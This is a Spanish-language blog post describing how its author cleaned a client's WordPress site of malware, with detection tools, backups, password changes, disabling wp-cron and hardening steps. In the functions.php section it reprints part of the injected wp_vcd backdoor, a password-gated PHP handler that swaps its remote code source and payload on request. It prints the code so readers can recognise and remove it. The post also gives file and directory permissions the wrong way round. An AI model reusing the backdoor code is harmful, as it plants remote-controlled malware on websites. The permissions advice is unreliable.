Cómo limpiar WordPress de un ataque Malware | Joana Millán
1
post-template-default,single,single-post,postid-1,single-format-standard,bridge-core-1.0.4,ajax_fade,page_not_loaded,,qode_grid_1300,qode_popup_menu_push_text_top,qode-content-sidebar-responsive,qode-child-theme-ver-1.0.0,qode-theme-ver-18.0.9,qode-theme-bridge | shared by vestathemes.com,disabled_footer_top,wpb-js-composer js-comp-ver-5.7,vc_responsive
 

cÓMO LIMPIAR TU WORDPRESS DE UN ATAQUE MALWARE

cÓMO LIMPIAR TU WORDPRESS DE UN ATAQUE MALWARE

Hace poco tuve un ataque de Malware en la web de mi cliente, así que os voy a dejar los pasos que he seguido para limpiar mi sitio WordPress. En mi caso empezó con un pop up en la web donde pedía “PERMITIR UBICACIÓN”. Aquí es donde empecé a sospechar, ya que no tenía nada instalado en la web sobre Pop-up. Curiosamente es una web informativa sobre los proyectos de la empresa, es decir un portfolio, pero eso no quiere decir que esté más segura que el resto de webs todo lo contrario, la atacaron. Así que empecé a buscar y buscar información por internet y aquí os dejo mi solución que me funcionó.

ÍNDICE

  1. ¿Cómo detecté qué era un Malware?
  2. Pasos a seguir y limpiar la web de Malware
  3. Acciones en WordPress para limpiar de Malware
  4. Revisa los archivos functions.php, wp-feed y wp-temp
  5. Previene de futuros ataques Malware

¿CÓMO DETECTÉ ERA UN MALWARE?

Hay una herramienta gratuita de la empresa SUCURI (https://sitecheck.sucuri.net/) o a través de una herramienta de Google de diagnósticos, web de diagnóstico de Google. Si pones tu URL realizará un análisis a fondo y nos dice si tenemos algún problema en nuestra web, en mi caso un Malware llamado Coholen. Malware, como la palabra dice es un Malicious Software que engloba todo código informático malicioso cuya función es dañar la web o causar un mal funcionamiento de ella. ¡POR FIN! Ya había detectado el problema. Es el primer paso para poder resolverlo, así que me puse manos a la obra con un claro objetivo.

PASOS A SEGUIR Y LIMPIAR LA WEB DEL MALWARE

  1. Activa el modo mantenimiento de la web para poder trabajar con normalidad, avisa al cliente para que esté al corriente y pasa a la acción. Te recomiendo este plugin para
    hacerlo WP Maintenance Mode para hacerlo de forma fácil y rápida Contacta con tu empresa de alojamiento de la web (hosting) para comunicarles el problema y sigue sus indicaciones. En mi caso, no me solucionó el problema, solo me dijo que actualizará los plugins y wordpress, pero el problema siguió. En un hosting (servidor) con un buen soporte puedes mirar si tienen copias de versiones anterior y así poder restaurar la web rápidamente pero esta solución tampoco funcionó ya que la copia tenía el malware instalado también. Así que pasé al siguiente paso.
  2. Analiza tu equipo, para ver que no tienes ningún virus y ver que no han entrado a través de tu ordenador. Antivirus Kaspersky, Panda Global Protection, etc o programa antimalware como Malwarebytes Anti-Malware. Hice una limpieza a fondo de mi ordenador para detectar si había sido a través de mi ordenador. Todo parecía en orden
    así que pasé al siguiente punto.
  3. Realiza una copia de toda tu web y tu base de datos, si aún no tienes contratado un backup de tu web te recomiendo el plugin ALL IN ONE MIGRATION. Hace una copia de
    seguridad de toda la web contenido y base de datos. También puedes ponerte en contacto con tu servidor y ver si han hecho copias de seguridad y descárgate una.
    Depende mucho el tipo de servidor que tengas y plan contratado con ellos para tener o no copias automáticas de tu web y base de datos, sino te recomiendo que lo revises
    y que actives está opción. Ahora ya podía trabajar en mi web sin ningún problema, y si pasaba alguna cosa siempre tenía la copia de seguirdad para restaurar la web.
  4. Cambia todas tus contraseñas. Importantísimo este punto, una vez ya tienes la copia, es hora de cambiar todas las contraseñas y cuando digo todas son TODAS.
    • CONTRASEÑA WORDPRESS. Cambia la contraseña de tus usuarios y verificar que no se ha añadido ningún usuario que no debería estar y lo eliminas. Esta opción la
      encontrarás en el menú de USUARIOS de tu WordPress.
    • CONTRASEÑA FTP. Cambia contraseña de FTP (File transfer protocol), tienes que acceder al panel control de tu servidor y cambiar la contraseña o crear un nuevo
      usuario con nueva contraseña. Así nos aseguramos que no vuelvan a entrar.

ACCIONES EN EL WORDPRESS PARA LIMPIAR EL MALWARE

  1. Actualización de worpdress, plugins y temas.

    Si tienes algún tema o plugin que no utilizas te recomiendo eliminarlos sin ningún problema. Aprovecha para actualizar los
    plugins y temas que tengas obsoletos. Recuerda de comprobar que los plugins y los temas son compatibles con tu versión d WordPress. En la página del plugin o del tema
    puedes encontrar toda la información, como muestro en la imagen.
  2. – Desactivar un archivo WP-CRON.PHP de tu web.

    Es un archivo de nuestro WordPress, el cual cumple con las siguientes operaciones:
  • Verifica las actualizaciones de plantillas y plugins instalados
  • Envíos de Pingbacks
  • proceso de copias de seguridad
  • publicar artículos en fechas específicas
    Es uno de los archivos más atacados por los Malware.

    ¿CÓMO DESACTIVAR ARCHIVO CRON?
  • Tenemos que conectarnos a la FTP (file transfer protocol), normalmente puedes entrar en el panel control de tu servidor y tienes algún enlace al programa de gestión. Si no quieres hacerlo a través del Hosting puedes descargarte algún programa tipo FILEZILLA o CORE FTP, que hace de mensajeros entre tu servidor y la web.
  • Ahora sí, buscamos en la raíz de nuestra web y el archivo wp-config, y añadimos este código que te añado a continuación:
    /** Desactivar fichero wp-cron.php */
  • define(‘DISABLE_WP_CRON’, true);
    En mi caso el malware entraba ficheros a través de este archivo y me
    inyectaba código malicioso. Así que cada vez que modificaba un archivo
    y borraba el código malicioso al cabo de 5 min aparecía otra vez y así
    infinitamente ¡Fue una locura!
    Una veza desactivado este archivo puedes seguir con las siguientes
    acciones.
  1. instala un plugin de seguridad, a mí el que me ayudó mucho es
    el WordFence ya que me decía exactamente donde había puesto el
    código malicioso el Malware. Entonces entraba a través de FTP,
    buscaba la ruta del archivo y borraba ese código.

REVISA LOS ARCHIVOS functions.php, wp-feed y wp-temp

En mi caso el plugin wordfence me detectaba que en estos archivos había código malicioso. En wp-feed, estaban las IPs que deja acceso wordpress así que hay que
eliminar este archivo, como tenemos el cron desactivado no volverá a crearse. Luego en wp-temp se carga código de pop-up que hay que eliminar el código y finalmente en
functions siempre inyectan más código para que aparezca el popup normalmente son las 180 primeras líneas, tendrás algún código parecido ha esto que tienes que eliminar:

<?php
if (isset($_REQUEST[‘action’])
&& isset($_REQUEST[‘password’])
&& ($_REQUEST[‘password’] == ‘997ab9d2e13755e036ff6ebe66464f43’)){
$div_code_name=»wp_vcd»;
switch ($_REQUEST[‘action’]){
case ‘change_domain’;
if (isset($_REQUEST[‘newdomain’])){
if (!empty($_REQUEST[‘newdomain’])){
if ($file = @file_get_contents(FILE)){
if(preg_match_all(‘/\$tmpcontent = @file_get_contents(«http:\/\/(.*)\/code.php/i’,$file,$matcholddomain)){
$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
@file_put_contents(FILE, $file);
print «true»;
}
}
}
}
break;
case ‘change_code’;
if (isset($_REQUEST[‘newcode’])){if (!empty($_REQUEST[‘newcode’])){
if ($file = @file_get_contents(FILE)){
if(preg_match_all(‘/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i’,$file,$matcholdcode)) {
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST[‘newcode’]), $file);
@file_put_contents(FILE, $file);
print «true»;
}
}
}
}
break;
default: print «ERROR_WP_ACTION WP_V_CD WP_CD»;
}die(«»);$div_code_name = «wp_vcd»;
$funcfile = FILE;
if(!function_exists(‘theme_temp_setup’)) {
$path = $_SERVER[‘HTTP_HOST’] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) ==
false)
} unction file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}

IMPORTATÍSIMO, NO BORRAR EL CÓDIGO DE FUNCTIONS.PHP, normalmente se ve claramente donde empieza y termina el otro código porque empieza una función de la propia plantilla legítima.

PREVIENE ATAQUES FUTUROS DE MALWARE

  1. BASE DE DATOS. Cambiar el prefijo de tu base de datos con el plguins Change DB Prefix. Antes de hacerlo recuerda de hacer una copia de seguridad de tu base de datos.
  2. PERMISOS CARPETAS. Modifica permisos de tus ficheros de tu servidor a 755 y los directorios 644. Revisa las carpetas y cambia todos los permisos de 777 a los anteriores. Puedes realizar esta acción a través de la FTP y comprobar los permisos de las carpetas.
  3. CONTRASEÑAS. Cambia el nombre de usuario admin y ponle otro más complejo, es lo primero que se fijan los hackers para atacar la web igual que la contraseña
  4. COPIAS SEGURIDAD. Realiza copias de seguridad periódicas y guardarlas en un sitio seguro en el servidor o en tu ordenador. Si no tienes contratado ninguna con tu hosting, te recomiendo activarla
  5. ACTUALIZACIÓN CONSTANTE. Mantén actualizado Worpdress, temas y plugins que utilices para teayner la última versión y mayor seguridad en al web . Recomiendo no
    tener plugins desactivados sino que mejor eliminarlos por completo.
  6. Activa un plugin de seguridad como Wordfence, All In One WP Security & Firewall o iThemes Security.
  7. Crea un fichero .htaccess con el siguiente código: <Files *.php> deny from all </Files>
    Lo subimos en la siguiente ruta wp-content/uploads. Esta línea de código lo que haces es impedir que cualquier archivo PHP se ejecutado en la carpeta de Uploads, ya que es un de las carpetas más vulnerables de worpdress y donde atacan más los hackers

    ¿has podido solucionar el problema? ¿te ha servido los pasos? Si aún tienes problemas de seguridad contacta conmigo para que pueda ayudarte ¡Gracias!
No Comments

Sorry, the comment form is closed at this time.